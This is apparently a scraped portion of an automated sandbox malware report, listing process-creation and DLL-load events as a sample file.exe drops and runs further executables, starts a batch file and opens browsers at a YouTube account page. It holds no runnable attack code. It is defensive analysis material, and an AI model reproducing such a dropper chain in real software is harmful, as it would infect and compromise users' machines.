Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe"
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 2456
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe "C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1056
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\5aa32fec17.exe "C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Users\user\1000003002\5aa32fec17.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5175.tmp\5176.tmp\5177.bat C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,12986128645903836916,990054772978296775,262144 /prefetch:3
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1908,i,2461605866906430469,16426006232859990592,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe "C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2356 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54a18292-6da0-4808-9925-4c7144e972d8} 3132 "\\.\pipe\gecko-crash-server-pipe.3132" 169b956bf10 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7216 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7368 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 1328
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7884 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7884 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4380 -parentBuildID 20230927232528 -prefsHandle 4008 -prefMapHandle 4124 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4885320-d06e-4770-870c-611d160c432d} 3132 "\\.\pipe\gecko-crash-server-pipe.3132" 169cbbee210 rdd
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe"
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe"
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe "C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\5aa32fec17.exe "C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Users\user\1000003002\5aa32fec17.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5175.tmp\5176.tmp\5177.bat C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1908,i,2461605866906430469,16426006232859990592,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,12986128645903836916,990054772978296775,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7216 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7368 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7884 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7884 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2356 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54a18292-6da0-4808-9925-4c7144e972d8} 3132 "\\.\pipe\gecko-crash-server-pipe.3132" 169b956bf10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4380 -parentBuildID 20230927232528 -prefsHandle 4008 -prefMapHandle 4124 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4885320-d06e-4770-870c-611d160c432d} 3132 "\\.\pipe\gecko-crash-server-pipe.3132" 169cbbee210 rdd
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
